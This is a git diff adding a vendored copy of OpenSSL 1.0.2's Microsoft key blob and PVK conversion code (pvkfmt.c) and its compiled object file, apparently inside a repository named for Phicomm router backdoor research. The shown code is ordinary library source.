+    for (i = 0; i < nbyte; i++)
+        *q++ = *p--;
+    *r = BN_bin2bn(tmpbuf, nbyte, NULL);
+    OPENSSL_free(tmpbuf);
+    if (*r) {
+        *in += nbyte;
+        return 1;
+    } else
+        return 0;
+}
+
+/* Convert private key blob to EVP_PKEY: RSA and DSA keys supported */
+
+# define MS_PUBLICKEYBLOB        0x6
+# define MS_PRIVATEKEYBLOB       0x7
+# define MS_RSA1MAGIC            0x31415352L
+# define MS_RSA2MAGIC            0x32415352L
+# define MS_DSS1MAGIC            0x31535344L
+# define MS_DSS2MAGIC            0x32535344L
+
+# define MS_KEYALG_RSA_KEYX      0xa400
+# define MS_KEYALG_DSS_SIGN      0x2200
+
+# define MS_KEYTYPE_KEYX         0x1
+# define MS_KEYTYPE_SIGN         0x2
+
+/* The PVK file magic number: seems to spell out "bobsfile", who is Bob? */
+# define MS_PVKMAGIC             0xb0b5f11eL
+/* Salt length for PVK files */
+# define PVK_SALTLEN             0x10
+
+static EVP_PKEY *b2i_rsa(const unsigned char **in, unsigned int length,
+                         unsigned int bitlen, int ispub);
+static EVP_PKEY *b2i_dss(const unsigned char **in, unsigned int length,
+                         unsigned int bitlen, int ispub);
+
+static int do_blob_header(const unsigned char **in, unsigned int length,
+                          unsigned int *pmagic, unsigned int *pbitlen,
+                          int *pisdss, int *pispub)
+{
+    const unsigned char *p = *in;
+    if (length < 16)
+        return 0;
+    /* bType */
+    if (*p == MS_PUBLICKEYBLOB) {
+        if (*pispub == 0) {
+            PEMerr(PEM_F_DO_BLOB_HEADER, PEM_R_EXPECTING_PRIVATE_KEY_BLOB);
+            return 0;
+        }
+        *pispub = 1;
+    } else if (*p == MS_PRIVATEKEYBLOB) {
+        if (*pispub == 1) {
+            PEMerr(PEM_F_DO_BLOB_HEADER, PEM_R_EXPECTING_PUBLIC_KEY_BLOB);
+            return 0;
+        }
+        *pispub = 0;
+    } else
+        return 0;
+    p++;
+    /* Version */
+    if (*p++ != 0x2) {
+        PEMerr(PEM_F_DO_BLOB_HEADER, PEM_R_BAD_VERSION_NUMBER);
+        return 0;
+    }
+    /* Ignore reserved, aiKeyAlg */
+    p += 6;
+    *pmagic = read_ledword(&p);
+    *pbitlen = read_ledword(&p);
+    *pisdss = 0;
+    switch (*pmagic) {
+
+    case MS_DSS1MAGIC:
+        *pisdss = 1;
+    case MS_RSA1MAGIC:
+        if (*pispub == 0) {
+            PEMerr(PEM_F_DO_BLOB_HEADER, PEM_R_EXPECTING_PRIVATE_KEY_BLOB);
+            return 0;
+        }
+        break;
+
+    case MS_DSS2MAGIC:
+        *pisdss = 1;
+    case MS_RSA2MAGIC:
+        if (*pispub == 1) {
+            PEMerr(PEM_F_DO_BLOB_HEADER, PEM_R_EXPECTING_PUBLIC_KEY_BLOB);
+            return 0;
+        }
+        break;
+
+    default:
+        PEMerr(PEM_F_DO_BLOB_HEADER, PEM_R_BAD_MAGIC_NUMBER);
+        return -1;
+    }
+    *in = p;
+    return 1;
+}
+
+static unsigned int blob_length(unsigned bitlen, int isdss, int ispub)
+{
+    unsigned int nbyte, hnbyte;
+    nbyte = (bitlen + 7) >> 3;
+    hnbyte = (bitlen + 15) >> 4;
+    if (isdss) {
+
+        /*
+         * Expected length: 20 for q + 3 components bitlen each + 24 for seed
+         * structure.
+         */
+        if (ispub)
+            return 44 + 3 * nbyte;
+        /*
+         * Expected length: 20 for q, priv, 2 bitlen components + 24 for seed
+         * structure.
+         */
+        else
+            return 64 + 2 * nbyte;
+    } else {
+        /* Expected length: 4 for 'e' + 'n' */
+        if (ispub)
+            return 4 + nbyte;
+        else
+            /*
+             * Expected length: 4 for 'e' and 7 other components. 2
+             * components are bitlen size, 5 are bitlen/2
+             */
+            return 4 + 2 * nbyte + 5 * hnbyte;
+    }
+
+}
+
+static EVP_PKEY *do_b2i(const unsigned char **in, unsigned int length,
+                        int ispub)
+{
+    const unsigned char *p = *in;
+    unsigned int bitlen, magic;
+    int isdss;
+    if (do_blob_header(&p, length, &magic, &bitlen, &isdss, &ispub) <= 0) {
+        PEMerr(PEM_F_DO_B2I, PEM_R_KEYBLOB_HEADER_PARSE_ERROR);
+        return NULL;
+    }
+    length -= 16;
+    if (length < blob_length(bitlen, isdss, ispub)) {
+        PEMerr(PEM_F_DO_B2I, PEM_R_KEYBLOB_TOO_SHORT);
+        return NULL;
+    }
+    if (isdss)
+        return b2i_dss(&p, length, bitlen, ispub);
+    else
+        return b2i_rsa(&p, length, bitlen, ispub);
+}
+
+static EVP_PKEY *do_b2i_bio(BIO *in, int ispub)
+{
+    const unsigned char *p;
+    unsigned char hdr_buf[16], *buf = NULL;
+    unsigned int bitlen, magic, length;
+    int isdss;
+    EVP_PKEY *ret = NULL;
+    if (BIO_read(in, hdr_buf, 16) != 16) {
+        PEMerr(PEM_F_DO_B2I_BIO, PEM_R_KEYBLOB_TOO_SHORT);
+        return NULL;
+    }
+    p = hdr_buf;
+    if (do_blob_header(&p, 16, &magic, &bitlen, &isdss, &ispub) <= 0)
+        return NULL;
+
+    length = blob_length(bitlen, isdss, ispub);
+    buf = OPENSSL_malloc(length);
+    if (!buf) {
+        PEMerr(PEM_F_DO_B2I_BIO, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    p = buf;
+    if (BIO_read(in, buf, length) != (int)length) {
+        PEMerr(PEM_F_DO_B2I_BIO, PEM_R_KEYBLOB_TOO_SHORT);
+        goto err;
+    }
+
+    if (isdss)
+        ret = b2i_dss(&p, length, bitlen, ispub);
+    else
+        ret = b2i_rsa(&p, length, bitlen, ispub);
+
+ err:
+    if (buf)
+        OPENSSL_free(buf);
+    return ret;
+}
+
+static EVP_PKEY *b2i_dss(const unsigned char **in, unsigned int length,
+                         unsigned int bitlen, int ispub)
+{
+    const unsigned char *p = *in;
+    EVP_PKEY *ret = NULL;
+    DSA *dsa = NULL;
+    BN_CTX *ctx = NULL;
+    unsigned int nbyte;
+    nbyte = (bitlen + 7) >> 3;
+
+    dsa = DSA_new();
+    ret = EVP_PKEY_new();
+    if (!dsa || !ret)
+        goto memerr;
+    if (!read_lebn(&p, nbyte, &dsa->p))
+        goto memerr;
+    if (!read_lebn(&p, 20, &dsa->q))
+        goto memerr;
+    if (!read_lebn(&p, nbyte, &dsa->g))
+        goto memerr;
+    if (ispub) {
+        if (!read_lebn(&p, nbyte, &dsa->pub_key))
+            goto memerr;
+    } else {
+        if (!read_lebn(&p, 20, &dsa->priv_key))
+            goto memerr;
+        /* Calculate public key */
+        if (!(dsa->pub_key = BN_new()))
+            goto memerr;
+        if (!(ctx = BN_CTX_new()))
+            goto memerr;
+
+        if (!BN_mod_exp(dsa->pub_key, dsa->g, dsa->priv_key, dsa->p, ctx))
+
+            goto memerr;
+        BN_CTX_free(ctx);
+    }
+
+    EVP_PKEY_set1_DSA(ret, dsa);
+    DSA_free(dsa);
+    *in = p;
+    return ret;
+
+ memerr:
+    PEMerr(PEM_F_B2I_DSS, ERR_R_MALLOC_FAILURE);
+    if (dsa)
+        DSA_free(dsa);
+    if (ret)
+        EVP_PKEY_free(ret);
+    if (ctx)
+        BN_CTX_free(ctx);
+    return NULL;
+}
+
+static EVP_PKEY *b2i_rsa(const unsigned char **in, unsigned int length,
+                         unsigned int bitlen, int ispub)
+{
+    const unsigned char *p = *in;
+    EVP_PKEY *ret = NULL;
+    RSA *rsa = NULL;
+    unsigned int nbyte, hnbyte;
+    nbyte = (bitlen + 7) >> 3;
+    hnbyte = (bitlen + 15) >> 4;
+    rsa = RSA_new();
+    ret = EVP_PKEY_new();
+    if (!rsa || !ret)
+        goto memerr;
+    rsa->e = BN_new();
+    if (!rsa->e)
+        goto memerr;
+    if (!BN_set_word(rsa->e, read_ledword(&p)))
+        goto memerr;
+    if (!read_lebn(&p, nbyte, &rsa->n))
+        goto memerr;
+    if (!ispub) {
+        if (!read_lebn(&p, hnbyte, &rsa->p))
+            goto memerr;
+        if (!read_lebn(&p, hnbyte, &rsa->q))
+            goto memerr;
+        if (!read_lebn(&p, hnbyte, &rsa->dmp1))
+            goto memerr;
+        if (!read_lebn(&p, hnbyte, &rsa->dmq1))
+            goto memerr;
+        if (!read_lebn(&p, hnbyte, &rsa->iqmp))
+            goto memerr;
+        if (!read_lebn(&p, nbyte, &rsa->d))
+            goto memerr;
+    }
+
+    EVP_PKEY_set1_RSA(ret, rsa);
+    RSA_free(rsa);
+    *in = p;
+    return ret;
+ memerr:
+    PEMerr(PEM_F_B2I_RSA, ERR_R_MALLOC_FAILURE);
+    if (rsa)
+        RSA_free(rsa);
+    if (ret)
+        EVP_PKEY_free(ret);
+    return NULL;
+}
+
+EVP_PKEY *b2i_PrivateKey(const unsigned char **in, long length)
+{
+    return do_b2i(in, length, 0);
+}
+
+EVP_PKEY *b2i_PublicKey(const unsigned char **in, long length)
+{
+    return do_b2i(in, length, 1);
+}
+
+EVP_PKEY *b2i_PrivateKey_bio(BIO *in)
+{
+    return do_b2i_bio(in, 0);
+}
+
+EVP_PKEY *b2i_PublicKey_bio(BIO *in)
+{
+    return do_b2i_bio(in, 1);
+}
+
+static void write_ledword(unsigned char **out, unsigned int dw)
+{
+    unsigned char *p = *out;
+    *p++ = dw & 0xff;
+    *p++ = (dw >> 8) & 0xff;
+    *p++ = (dw >> 16) & 0xff;
+    *p++ = (dw >> 24) & 0xff;
+    *out = p;
+}
+
+static void write_lebn(unsigned char **out, const BIGNUM *bn, int len)
+{
+    int nb, i;
+    unsigned char *p = *out, *q, c;
+    nb = BN_num_bytes(bn);
+    BN_bn2bin(bn, p);
+    q = p + nb - 1;
+    /* In place byte order reversal */
+    for (i = 0; i < nb / 2; i++) {
+        c = *p;
+        *p++ = *q;
+        *q-- = c;
+    }
+    *out += nb;
+    /* Pad with zeroes if we have to */
+    if (len > 0) {
+        len -= nb;
+        if (len > 0) {
+            memset(*out, 0, len);
+            *out += len;
+        }
+    }
+}
+
+static int check_bitlen_rsa(RSA *rsa, int ispub, unsigned int *magic);
+static int check_bitlen_dsa(DSA *dsa, int ispub, unsigned int *magic);
+
+static void write_rsa(unsigned char **out, RSA *rsa, int ispub);
+static void write_dsa(unsigned char **out, DSA *dsa, int ispub);
+
+static int do_i2b(unsigned char **out, EVP_PKEY *pk, int ispub)
+{
+    unsigned char *p;
+    unsigned int bitlen, magic = 0, keyalg;
+    int outlen, noinc = 0;
+    if (pk->type == EVP_PKEY_DSA) {
+        bitlen = check_bitlen_dsa(pk->pkey.dsa, ispub, &magic);
+        keyalg = MS_KEYALG_DSS_SIGN;
+    } else if (pk->type == EVP_PKEY_RSA) {
+        bitlen = check_bitlen_rsa(pk->pkey.rsa, ispub, &magic);
+        keyalg = MS_KEYALG_RSA_KEYX;
+    } else
+        return -1;
+    if (bitlen == 0)
+        return -1;
+    outlen = 16 + blob_length(bitlen,
+                              keyalg == MS_KEYALG_DSS_SIGN ? 1 : 0, ispub);
+    if (out == NULL)
+        return outlen;
+    if (*out)
+        p = *out;
+    else {
+        p = OPENSSL_malloc(outlen);
+        if (!p)
+            return -1;
+        *out = p;
+        noinc = 1;
+    }
+    if (ispub)
+        *p++ = MS_PUBLICKEYBLOB;
+    else
+        *p++ = MS_PRIVATEKEYBLOB;
+    *p++ = 0x2;
+    *p++ = 0;
+    *p++ = 0;
+    write_ledword(&p, keyalg);
+    write_ledword(&p, magic);
+    write_ledword(&p, bitlen);
+    if (keyalg == MS_KEYALG_DSS_SIGN)
+        write_dsa(&p, pk->pkey.dsa, ispub);
+    else
+        write_rsa(&p, pk->pkey.rsa, ispub);
+    if (!noinc)
+        *out += outlen;
+    return outlen;
+}
+
+static int do_i2b_bio(BIO *out, EVP_PKEY *pk, int ispub)
+{
+    unsigned char *tmp = NULL;
+    int outlen, wrlen;
+    outlen = do_i2b(&tmp, pk, ispub);
+    if (outlen < 0)
+        return -1;
+    wrlen = BIO_write(out, tmp, outlen);
+    OPENSSL_free(tmp);
+    if (wrlen == outlen)
+        return outlen;
+    return -1;
+}
+
+static int check_bitlen_dsa(DSA *dsa, int ispub, unsigned int *pmagic)
+{
+    int bitlen;
+    bitlen = BN_num_bits(dsa->p);
+    if ((bitlen & 7) || (BN_num_bits(dsa->q) != 160)
+        || (BN_num_bits(dsa->g) > bitlen))
+        goto badkey;
+    if (ispub) {
+        if (BN_num_bits(dsa->pub_key) > bitlen)
+            goto badkey;
+        *pmagic = MS_DSS1MAGIC;
+    } else {
+        if (BN_num_bits(dsa->priv_key) > 160)
+            goto badkey;
+        *pmagic = MS_DSS2MAGIC;
+    }
+
+    return bitlen;
+ badkey:
+    PEMerr(PEM_F_CHECK_BITLEN_DSA, PEM_R_UNSUPPORTED_KEY_COMPONENTS);
+    return 0;
+}
+
+static int check_bitlen_rsa(RSA *rsa, int ispub, unsigned int *pmagic)
+{
+    int nbyte, hnbyte, bitlen;
+    if (BN_num_bits(rsa->e) > 32)
+        goto badkey;
+    bitlen = BN_num_bits(rsa->n);
+    nbyte = BN_num_bytes(rsa->n);
+    hnbyte = (BN_num_bits(rsa->n) + 15) >> 4;
+    if (ispub) {
+        *pmagic = MS_RSA1MAGIC;
+        return bitlen;
+    } else {
+        *pmagic = MS_RSA2MAGIC;
+        /*
+         * For private key each component must fit within nbyte or hnbyte.
+         */
+        if (BN_num_bytes(rsa->d) > nbyte)
+            goto badkey;
+        if ((BN_num_bytes(rsa->iqmp) > hnbyte)
+            || (BN_num_bytes(rsa->p) > hnbyte)
+            || (BN_num_bytes(rsa->q) > hnbyte)
+            || (BN_num_bytes(rsa->dmp1) > hnbyte)
+            || (BN_num_bytes(rsa->dmq1) > hnbyte))
+            goto badkey;
+    }
+    return bitlen;
+ badkey:
+    PEMerr(PEM_F_CHECK_BITLEN_RSA, PEM_R_UNSUPPORTED_KEY_COMPONENTS);
+    return 0;
+}
+
+static void write_rsa(unsigned char **out, RSA *rsa, int ispub)
+{
+    int nbyte, hnbyte;
+    nbyte = BN_num_bytes(rsa->n);
+    hnbyte = (BN_num_bits(rsa->n) + 15) >> 4;
+    write_lebn(out, rsa->e, 4);
+    write_lebn(out, rsa->n, -1);
+    if (ispub)
+        return;
+    write_lebn(out, rsa->p, hnbyte);
+    write_lebn(out, rsa->q, hnbyte);
+    write_lebn(out, rsa->dmp1, hnbyte);
+    write_lebn(out, rsa->dmq1, hnbyte);
+    write_lebn(out, rsa->iqmp, hnbyte);
+    write_lebn(out, rsa->d, nbyte);
+}
+
+static void write_dsa(unsigned char **out, DSA *dsa, int ispub)
+{
+    int nbyte;
+    nbyte = BN_num_bytes(dsa->p);
+    write_lebn(out, dsa->p, nbyte);
+    write_lebn(out, dsa->q, 20);
+    write_lebn(out, dsa->g, nbyte);
+    if (ispub)
+        write_lebn(out, dsa->pub_key, nbyte);
+    else
+        write_lebn(out, dsa->priv_key, 20);
+    /* Set "invalid" for seed structure values */
+    memset(*out, 0xff, 24);
+    *out += 24;
+    return;
+}
+
+int i2b_PrivateKey_bio(BIO *out, EVP_PKEY *pk)
+{
+    return do_i2b_bio(out, pk, 0);
+}
+
+int i2b_PublicKey_bio(BIO *out, EVP_PKEY *pk)
+{
+    return do_i2b_bio(out, pk, 1);
+}
+
+# ifndef OPENSSL_NO_RC4
+
+static int do_PVK_header(const unsigned char **in, unsigned int length,
+                         int skip_magic,
+                         unsigned int *psaltlen, unsigned int *pkeylen)
+{
+    const unsigned char *p = *in;
+    unsigned int pvk_magic, is_encrypted;
+    if (skip_magic) {
+        if (length < 20) {
+            PEMerr(PEM_F_DO_PVK_HEADER, PEM_R_PVK_TOO_SHORT);
+            return 0;
+        }
+        length -= 20;
+    } else {
+        if (length < 24) {
+            PEMerr(PEM_F_DO_PVK_HEADER, PEM_R_PVK_TOO_SHORT);
+            return 0;
+        }
+        length -= 24;
+        pvk_magic = read_ledword(&p);
+        if (pvk_magic != MS_PVKMAGIC) {
+            PEMerr(PEM_F_DO_PVK_HEADER, PEM_R_BAD_MAGIC_NUMBER);
+            return 0;
+        }
+    }
+    /* Skip reserved */
+    p += 4;
+    /*
+     * keytype =
+     */ read_ledword(&p);
+    is_encrypted = read_ledword(&p);
+    *psaltlen = read_ledword(&p);
+    *pkeylen = read_ledword(&p);
+
+    if (is_encrypted && !*psaltlen) {
+        PEMerr(PEM_F_DO_PVK_HEADER, PEM_R_INCONSISTENT_HEADER);
+        return 0;
+    }
+
+    *in = p;
+    return 1;
+}
+
+static int derive_pvk_key(unsigned char *key,
+                          const unsigned char *salt, unsigned int saltlen,
+                          const unsigned char *pass, int passlen)
+{
+    EVP_MD_CTX mctx;
+    int rv = 1;
+    EVP_MD_CTX_init(&mctx);
+    if (!EVP_DigestInit_ex(&mctx, EVP_sha1(), NULL)
+        || !EVP_DigestUpdate(&mctx, salt, saltlen)
+        || !EVP_DigestUpdate(&mctx, pass, passlen)
+        || !EVP_DigestFinal_ex(&mctx, key, NULL))
+        rv = 0;
+
+    EVP_MD_CTX_cleanup(&mctx);
+    return rv;
+}
+
+static EVP_PKEY *do_PVK_body(const unsigned char **in,
+                             unsigned int saltlen, unsigned int keylen,
+                             pem_password_cb *cb, void *u)
+{
+    EVP_PKEY *ret = NULL;
+    const unsigned char *p = *in;
+    unsigned int magic;
+    unsigned char *enctmp = NULL, *q;
+    EVP_CIPHER_CTX cctx;
+    EVP_CIPHER_CTX_init(&cctx);
+    if (saltlen) {
+        char psbuf[PEM_BUFSIZE];
+        unsigned char keybuf[20];
+        int enctmplen, inlen;
+        if (cb)
+            inlen = cb(psbuf, PEM_BUFSIZE, 0, u);
+        else
+            inlen = PEM_def_callback(psbuf, PEM_BUFSIZE, 0, u);
+        if (inlen <= 0) {
+            PEMerr(PEM_F_DO_PVK_BODY, PEM_R_BAD_PASSWORD_READ);
+            return NULL;
+        }
+        enctmp = OPENSSL_malloc(keylen + 8);
+        if (!enctmp) {
+            PEMerr(PEM_F_DO_PVK_BODY, ERR_R_MALLOC_FAILURE);
+            return NULL;
+        }
+        if (!derive_pvk_key(keybuf, p, saltlen,
+                            (unsigned char *)psbuf, inlen))
+            return NULL;
+        p += saltlen;
+        /* Copy BLOBHEADER across, decrypt rest */
+        memcpy(enctmp, p, 8);
+        p += 8;
+        if (keylen < 8) {
+            PEMerr(PEM_F_DO_PVK_BODY, PEM_R_PVK_TOO_SHORT);
+            return NULL;
+        }
+        inlen = keylen - 8;
+        q = enctmp + 8;
+        if (!EVP_DecryptInit_ex(&cctx, EVP_rc4(), NULL, keybuf, NULL))
+            goto err;
+        if (!EVP_DecryptUpdate(&cctx, q, &enctmplen, p, inlen))
+            goto err;
+        if (!EVP_DecryptFinal_ex(&cctx, q + enctmplen, &enctmplen))
+            goto err;
+        magic = read_ledword((const unsigned char **)&q);
+        if (magic != MS_RSA2MAGIC && magic != MS_DSS2MAGIC) {
+            q = enctmp + 8;
+            memset(keybuf + 5, 0, 11);
+            if (!EVP_DecryptInit_ex(&cctx, EVP_rc4(), NULL, keybuf, NULL))
+                goto err;
+            OPENSSL_cleanse(keybuf, 20);
+            if (!EVP_DecryptUpdate(&cctx, q, &enctmplen, p, inlen))
+                goto err;
+            if (!EVP_DecryptFinal_ex(&cctx, q + enctmplen, &enctmplen))
+                goto err;
+            magic = read_ledword((const unsigned char **)&q);
+            if (magic != MS_RSA2MAGIC && magic != MS_DSS2MAGIC) {
+                PEMerr(PEM_F_DO_PVK_BODY, PEM_R_BAD_DECRYPT);
+                goto err;
+            }
+        } else
+            OPENSSL_cleanse(keybuf, 20);
+        p = enctmp;
+    }
+
+    ret = b2i_PrivateKey(&p, keylen);
+ err:
+    EVP_CIPHER_CTX_cleanup(&cctx);
+    if (enctmp && saltlen)
+        OPENSSL_free(enctmp);
+    return ret;
+}
+
+EVP_PKEY *b2i_PVK_bio(BIO *in, pem_password_cb *cb, void *u)
+{
+    unsigned char pvk_hdr[24], *buf = NULL;
+    const unsigned char *p;
+    int buflen;
+    EVP_PKEY *ret = NULL;
+    unsigned int saltlen, keylen;
+    if (BIO_read(in, pvk_hdr, 24) != 24) {
+        PEMerr(PEM_F_B2I_PVK_BIO, PEM_R_PVK_DATA_TOO_SHORT);
+        return NULL;
+    }
+    p = pvk_hdr;
+
+    if (!do_PVK_header(&p, 24, 0, &saltlen, &keylen))
+        return 0;
+    buflen = (int)keylen + saltlen;
+    buf = OPENSSL_malloc(buflen);
+    if (!buf) {
+        PEMerr(PEM_F_B2I_PVK_BIO, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    p = buf;
+    if (BIO_read(in, buf, buflen) != buflen) {
+        PEMerr(PEM_F_B2I_PVK_BIO, PEM_R_PVK_DATA_TOO_SHORT);
+        goto err;
+    }
+    ret = do_PVK_body(&p, saltlen, keylen, cb, u);
+
+ err:
+    if (buf) {
+        OPENSSL_cleanse(buf, buflen);
+        OPENSSL_free(buf);
+    }
+    return ret;
+}
+
+static int i2b_PVK(unsigned char **out, EVP_PKEY *pk, int enclevel,
+                   pem_password_cb *cb, void *u)
+{
+    int outlen = 24, pklen;
+    unsigned char *p, *salt = NULL;
+    EVP_CIPHER_CTX cctx;
+    EVP_CIPHER_CTX_init(&cctx);
+    if (enclevel)
+        outlen += PVK_SALTLEN;
+    pklen = do_i2b(NULL, pk, 0);
+    if (pklen < 0)
+        return -1;
+    outlen += pklen;
+    if (!out)
+        return outlen;
+    if (*out)
+        p = *out;
+    else {
+        p = OPENSSL_malloc(outlen);
+        if (!p) {
+            PEMerr(PEM_F_I2B_PVK, ERR_R_MALLOC_FAILURE);
+            return -1;
+        }
+        *out = p;
+    }
+
+    write_ledword(&p, MS_PVKMAGIC);
+    write_ledword(&p, 0);
+    if (pk->type == EVP_PKEY_DSA)
+        write_ledword(&p, MS_KEYTYPE_SIGN);
+    else
+        write_ledword(&p, MS_KEYTYPE_KEYX);
+    write_ledword(&p, enclevel ? 1 : 0);
+    write_ledword(&p, enclevel ? PVK_SALTLEN : 0);
+    write_ledword(&p, pklen);
+    if (enclevel) {
+        if (RAND_bytes(p, PVK_SALTLEN) <= 0)
+            goto error;
+        salt = p;
+        p += PVK_SALTLEN;
+    }
+    do_i2b(&p, pk, 0);
+    if (enclevel == 0)
+        return outlen;
+    else {
+        char psbuf[PEM_BUFSIZE];
+        unsigned char keybuf[20];
+        int enctmplen, inlen;
+        if (cb)
+            inlen = cb(psbuf, PEM_BUFSIZE, 1, u);
+        else
+            inlen = PEM_def_callback(psbuf, PEM_BUFSIZE, 1, u);
+        if (inlen <= 0) {
+            PEMerr(PEM_F_I2B_PVK, PEM_R_BAD_PASSWORD_READ);
+            goto error;
+        }
+        if (!derive_pvk_key(keybuf, salt, PVK_SALTLEN,
+                            (unsigned char *)psbuf, inlen))
+            goto error;
+        if (enclevel == 1)
+            memset(keybuf + 5, 0, 11);
+        p = salt + PVK_SALTLEN + 8;
+        if (!EVP_EncryptInit_ex(&cctx, EVP_rc4(), NULL, keybuf, NULL))
+            goto error;
+        OPENSSL_cleanse(keybuf, 20);
+        if (!EVP_DecryptUpdate(&cctx, p, &enctmplen, p, pklen - 8))
+            goto error;
+        if (!EVP_DecryptFinal_ex(&cctx, p + enctmplen, &enctmplen))
+            goto error;
+    }
+    EVP_CIPHER_CTX_cleanup(&cctx);
+    return outlen;
+
+ error:
+    EVP_CIPHER_CTX_cleanup(&cctx);
+    return -1;
+}
+
+int i2b_PVK_bio(BIO *out, EVP_PKEY *pk, int enclevel,
+                pem_password_cb *cb, void *u)
+{
+    unsigned char *tmp = NULL;
+    int outlen, wrlen;
+    outlen = i2b_PVK(&tmp, pk, enclevel, cb, u);
+    if (outlen < 0)
+        return -1;
+    wrlen = BIO_write(out, tmp, outlen);
+    OPENSSL_free(tmp);
+    if (wrlen == outlen) {
+        PEMerr(PEM_F_I2B_PVK_BIO, PEM_R_BIO_WRITE_FAILURE);
+        return outlen;
+    }
+    return -1;
+}
+
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pvkfmt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pvkfmt.o
new file mode 100644
index 0000000000000000000000000000000000000000..3c4aaab0d92c6a14ca005bc4623592c4f617868d
GIT binary patch
literal 14008
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
